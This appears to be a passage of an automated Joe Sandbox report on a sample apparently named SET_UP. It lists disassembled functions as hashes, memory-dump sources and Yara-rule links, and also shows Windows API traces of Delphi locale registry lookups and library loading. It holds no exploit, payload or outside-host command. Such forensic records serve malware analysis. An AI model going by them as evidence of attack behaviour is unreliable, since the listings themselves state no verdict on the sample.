                                                                                                                                            • Opcode ID: 0e3ad3ef89e5ae96c4e8026419461686e5f7a63965637896b7f9e321e1d86ad2
                                                                                                                                            • Instruction ID: b995fc1a06f4638c7e5e40b27c7cec369d804fec9a9a0f81775494221786fecd
                                                                                                                                            • Opcode Fuzzy Hash: 0e3ad3ef89e5ae96c4e8026419461686e5f7a63965637896b7f9e321e1d86ad2
                                                                                                                                            • Instruction Fuzzy Hash: C6110830918320CBD721CB24DC40EA7B7E9F787328F155938D458D3192D320A9198FD9
                                                                                                                                            Function 025043C0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0506ec55bb1eeabb00de8469fc935753d476aebcff7e72f4d02f84938f7234cf
                                                                                                                                            • Instruction ID: 6bc314b7d2f811aa722a9e9f185a3830fbe2e8900fec4cffed509bea1844635f
                                                                                                                                            • Opcode Fuzzy Hash: 0506ec55bb1eeabb00de8469fc935753d476aebcff7e72f4d02f84938f7234cf
                                                                                                                                            • Instruction Fuzzy Hash: E811E73BB2562147E350DE76ECD465E6752FBC631474A0638FF41D7282C6A2E411C164
                                                                                                                                            Function 0250EF55 Relevance: .1, Instructions: 76COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 19e0741ed9c97644068f5c97cc4be2eb41302857e97e0033660ae995ca00ca95
                                                                                                                                            • Instruction ID: 8963eb700b396c4e24fc9c3810486d8864b7899d13f754ed389eb7bf3f30dddf
                                                                                                                                            • Opcode Fuzzy Hash: 19e0741ed9c97644068f5c97cc4be2eb41302857e97e0033660ae995ca00ca95
                                                                                                                                            • Instruction Fuzzy Hash: DF317CB86193808BE734CF14D891BBBB7E2BFD9304F14982DE0CA97290DBB45505CB1A
                                                                                                                                            Function 02515903 Relevance: .1, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3abd891059b141b24cd798c1e4512bb2b8ef323e6b84dc6fffad9dab0f12943c
                                                                                                                                            • Instruction ID: 2b4ffef3494c018dd8dd31c24cb43d410dc5ede3a737892135622e77108dc95c
                                                                                                                                            • Opcode Fuzzy Hash: 3abd891059b141b24cd798c1e4512bb2b8ef323e6b84dc6fffad9dab0f12943c
                                                                                                                                            • Instruction Fuzzy Hash: 97114935E452249BFB248B58EC41B7D7A72BBC6720FA51129E580B7295DB704850CF8E
                                                                                                                                            Function 0253A947 Relevance: .1, Instructions: 71COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2ea99c3175c99b4b9d58dd970fddc09177dc1d4101d414df02a34867b1b3dceb
                                                                                                                                            • Instruction ID: 8867a254b0ce9068c23b1ede79c4b10111c9188afa7c3147854278a51b4a20f3
                                                                                                                                            • Opcode Fuzzy Hash: 2ea99c3175c99b4b9d58dd970fddc09177dc1d4101d414df02a34867b1b3dceb
                                                                                                                                            • Instruction Fuzzy Hash: FC114CB7A041145BD317DF14ED4453A77A2FBC1214F06952CD8C923604D336DD5A878A
                                                                                                                                            Function 0253F657 Relevance: .1, Instructions: 70COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 268cc2831dc83cbda8c33c9c06aca7cc4846e01a7a7b5c06cb17db831d3db092
                                                                                                                                            • Instruction ID: 3c5407e9ff831c96518b29465972cda4328eda8904784f85880396b241d49379
                                                                                                                                            • Opcode Fuzzy Hash: 268cc2831dc83cbda8c33c9c06aca7cc4846e01a7a7b5c06cb17db831d3db092
                                                                                                                                            • Instruction Fuzzy Hash: 411126B8B482108BD70A9F18ECF15BB7761FB56304F28B83CD696D3621C7209916CB0D
                                                                                                                                            Function 0251797C Relevance: .1, Instructions: 70COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cdb834b65ea7fca570a4c06b6d624a0e2a726dd685f086b04c11d5a165a245c3
                                                                                                                                            • Instruction ID: b493dff45bad7b79b236db6f0949842ed9a0173ddef2a7e0f996ec33b25709a0
                                                                                                                                            • Opcode Fuzzy Hash: cdb834b65ea7fca570a4c06b6d624a0e2a726dd685f086b04c11d5a165a245c3
                                                                                                                                            • Instruction Fuzzy Hash: E401D274648200DFE3208B1CD980B6BFBA6BBCE324F145929D0C893251CB31E895CB5E
                                                                                                                                            Function 02500FD2 Relevance: .1, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                            • Instruction ID: 1486e2d2cc0b0c6a1b444f61bb1b832ea25096ef628a70f2d6f70a7ee6fed42c
                                                                                                                                            • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                            • Instruction Fuzzy Hash: AD319374E01109DFCB08CF98C590AAEBBB1FF88314F248599D855AB345D735AA81CF95
                                                                                                                                            Function 025370C0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                            • Instruction ID: 7c0c0d33bff8982ee9721e58526f341513e5c0054f73cdf3deba9c4968ed7847
                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                            • Instruction Fuzzy Hash: 3A11E573E051D40EC3178D3C8840665FFA32A97138F19A799F4B89B2D6D6228D8A8368
                                                                                                                                            Function 0252C140 Relevance: .1, Instructions: 63COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cb6c4ca0e52fa44ff4b01888bd06a5fe12ceb0c8ea8b7b49ef795fe7b77bbdac
                                                                                                                                            • Instruction ID: ae54942040b9f10c9209b918a232bd09b795dca2003efd6f5b3b2129bffd7bd3
                                                                                                                                            • Opcode Fuzzy Hash: cb6c4ca0e52fa44ff4b01888bd06a5fe12ceb0c8ea8b7b49ef795fe7b77bbdac
                                                                                                                                            • Instruction Fuzzy Hash: C901B1F1A0032247E7209E55D8C172FB6A97FE2709F09082DD808473C7DB72E908CAD9
                                                                                                                                            Function 025178EC Relevance: .1, Instructions: 58COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d5a0ed1a740e7cdcb38050d7573569380e0c94f9b003a8a6709457b98499fd3b
                                                                                                                                            • Instruction ID: 100ff7b5b39d6a893eef440834abfd177a90123738723847dfb0179d89a3924a
                                                                                                                                            • Opcode Fuzzy Hash: d5a0ed1a740e7cdcb38050d7573569380e0c94f9b003a8a6709457b98499fd3b
                                                                                                                                            • Instruction Fuzzy Hash: ED01FE746052008BFB159B1CDC51B37B7D5FB8E324F18186CE1C593061D7109895CA1E
                                                                                                                                            Function 02528F5E Relevance: .0, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 60cdadd2d6ca1a404155b8914a35519751a0b1e4f1b1f30032323785c3c0ac77
                                                                                                                                            • Instruction ID: 9ca3c77cbace5fc7236f274776d9802da0eb5150db89e2bab368ce5aa568bcf6
                                                                                                                                            • Opcode Fuzzy Hash: 60cdadd2d6ca1a404155b8914a35519751a0b1e4f1b1f30032323785c3c0ac77
                                                                                                                                            • Instruction Fuzzy Hash: AA116572A042518FDB19CF68C98056B7BB2AB8A300B59C598D8869F34EDB34DD05CBD5
                                                                                                                                            Function 0252D590 Relevance: .0, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7d2bb327e109cc06b0f5bcee56e9a19d3659d92beffae06204f8a55db50f8f19
                                                                                                                                            • Instruction ID: 38885dab95b9dae8ad0b402a02344ce8e9e934b972a9d1dcaf17acf57e1df850
                                                                                                                                            • Opcode Fuzzy Hash: 7d2bb327e109cc06b0f5bcee56e9a19d3659d92beffae06204f8a55db50f8f19
                                                                                                                                            • Instruction Fuzzy Hash: 00F0EC147992920BE31897385475BBFABE1DB8352CF241A3CC197D35D3F6158807460D
                                                                                                                                            Function 02529A43 Relevance: .0, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 37a145cfc2582a393a5abca62aaffd33ba10fb2980a0aa0c1975c78bfa6344a3
                                                                                                                                            • Instruction ID: 0abbcda49abc7916bc6629423ab871371996d519890a1a32076170196fd39e5f
                                                                                                                                            • Opcode Fuzzy Hash: 37a145cfc2582a393a5abca62aaffd33ba10fb2980a0aa0c1975c78bfa6344a3
                                                                                                                                            • Instruction Fuzzy Hash: AC0146B19183819FE724CF24CC90F9AB7F5BB86314F104A1DF188A72D0D770A908CB6A
                                                                                                                                            Function 02500D33 Relevance: .0, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                            • Instruction ID: 90ff9858ea602bca0ab483a12437711fe80227b31c1b460a5f2d232dda474466
                                                                                                                                            • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                            • Instruction Fuzzy Hash: 5301D235A00508EBCB14EF98C6C4AACBBB2FB44310F608199D805AB3D1D731AF82DB94
                                                                                                                                            Function 025252BE Relevance: .0, Instructions: 29COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d10d6712e7658b121f7fe8215e57a7f45813b054681b253757660a489d57e302
                                                                                                                                            • Instruction ID: 70de738d136ae324a587ce628789586db2193fd055341593885a5a9934aa2f51
                                                                                                                                            • Opcode Fuzzy Hash: d10d6712e7658b121f7fe8215e57a7f45813b054681b253757660a489d57e302
                                                                                                                                            • Instruction Fuzzy Hash: 7DE0B671BC8300BAF6305A019C43F67BAB9A786F44F345424B7447E1E0D5E2F5918A1E
                                                                                                                                            Function 02518DB0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4afed9cbd1dc825d27557ac164b7de5c6aa616c84845b555acfa8b92606e6a97
                                                                                                                                            • Instruction ID: c42b93ac75df14a10c3d51d79fbfe8feac37505a720afb0b2e837ce73dfbe912
                                                                                                                                            • Opcode Fuzzy Hash: 4afed9cbd1dc825d27557ac164b7de5c6aa616c84845b555acfa8b92606e6a97
                                                                                                                                            • Instruction Fuzzy Hash: 21F06DB49193418BE720CF28D51978BB7F1BBC2318F04982CD48C8B296CB76C505CB46
                                                                                                                                            Function 0253FBB2 Relevance: .0, Instructions: 23COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2c0e252928e5872d85f37575665bf770b898ed14bee6f7f219f34b7b7ce903ca
                                                                                                                                            • Instruction ID: 19ef15059c49fa9076ed2a2acf487162d8e0e461695cb4b18c096fd00310b8ce
                                                                                                                                            • Opcode Fuzzy Hash: 2c0e252928e5872d85f37575665bf770b898ed14bee6f7f219f34b7b7ce903ca
                                                                                                                                            • Instruction Fuzzy Hash: B2E012746482D04BD714CB289860567BBF5E78B228F146B6DD591D36A1D321D8119B0D
                                                                                                                                            Function 0250D7A3 Relevance: .0, Instructions: 21COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6810b6d46a952c214fc29e8ff1f8a53579113133959a9dcb001a82a5e45cd878
                                                                                                                                            • Instruction ID: 943a043525adc0da0604801db6f2d08c6e1c8301b58a442a41a4ec0769ae4e93
                                                                                                                                            • Opcode Fuzzy Hash: 6810b6d46a952c214fc29e8ff1f8a53579113133959a9dcb001a82a5e45cd878
                                                                                                                                            • Instruction Fuzzy Hash: C1D0129AE8240047958CA720FC1367AB27663D11687187439880B92716E52CE275444E
                                                                                                                                            Function 0252A523 Relevance: .0, Instructions: 8COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7683a963f0b85eb226109e5c0f476563a86777221ebc2b17fa5854b28863c542
                                                                                                                                            • Instruction ID: 4326241f077242413d59d4c2d88011ff9c70bf5013a76452298f28dfe7919027
                                                                                                                                            • Opcode Fuzzy Hash: 7683a963f0b85eb226109e5c0f476563a86777221ebc2b17fa5854b28863c542
                                                                                                                                            • Instruction Fuzzy Hash: C2A001A9C5A41586A5416F10AC414BAF1396E9B615F083870850A2215BA626D29A899E
                                                                                                                                            Function 0252B490 Relevance: .0, Instructions: 7COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 81beb11595da8827ab912e0e2eb6b9a7b21cd3a042657aadaeead8b411890959
                                                                                                                                            • Instruction ID: 2000c7091ff4bc1de3599f06e1dbc1dad42ede9db2264f25484afccc2670421b
                                                                                                                                            • Opcode Fuzzy Hash: 81beb11595da8827ab912e0e2eb6b9a7b21cd3a042657aadaeead8b411890959
                                                                                                                                            • Instruction Fuzzy Hash: CFB00138A4C2548BC264CF44D590AB5F3B9A78B612F60B998948DE3251CB64EC498B4D
                                                                                                                                            Function 0253A9D7 Relevance: .0, Instructions: 6COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8040620f24d7916026884ecf1269d82e51e939f1d15d79c09347fec44e54cb70
                                                                                                                                            • Instruction ID: 590d2c24fbd406466b56e3aa512f0f960710b72e365dd743c2eb42e9bf7969b5
                                                                                                                                            • Opcode Fuzzy Hash: 8040620f24d7916026884ecf1269d82e51e939f1d15d79c09347fec44e54cb70
                                                                                                                                            • Instruction Fuzzy Hash: 2F900225D48500968101CF0494404B1E278D34B151F2038109118F3011C230D850560C

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 5000C58C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 207registrystringlibraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,50120000,50242008), ref: 5000C5A8
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5C8
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5E6
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                                                            • RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 5000C6D7
                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 5000C6E4
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 5000C6EA
                                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 5000C718
                                                                                                                                            • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 5000C76E
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 5000C77E
                                                                                                                                            • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 5000C7AE
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 5000C7BE
                                                                                                                                            • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 5000C7ED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Openlstrcpyn$LibraryLoadLocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                                                            • API String ID: 3838733197-345420546
                                                                                                                                            • Opcode ID: feeedae3e6eb645ae8584e3f9f28829b83a7b9d0ae490e361948e0fb3c0780ec
                                                                                                                                            • Instruction ID: 6e1fecd616c3af7657caa769789cc1cef116f98790ddf8cab21a8ed1a68448cd
                                                                                                                                            • Opcode Fuzzy Hash: feeedae3e6eb645ae8584e3f9f28829b83a7b9d0ae490e361948e0fb3c0780ec
                                                                                                                                            • Instruction Fuzzy Hash: 586164719402597AFB10DBE4DC55FEE73FCDB08310F944262B604E65C1EBB4DA448BA5
                                                                                                                                            Function 5000C390 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 152stringlibraryfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,50120000,50242008), ref: 5000C3AD
                                                                                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 5000C3C4
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?,?,50120000,50242008), ref: 5000C3F4
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C463
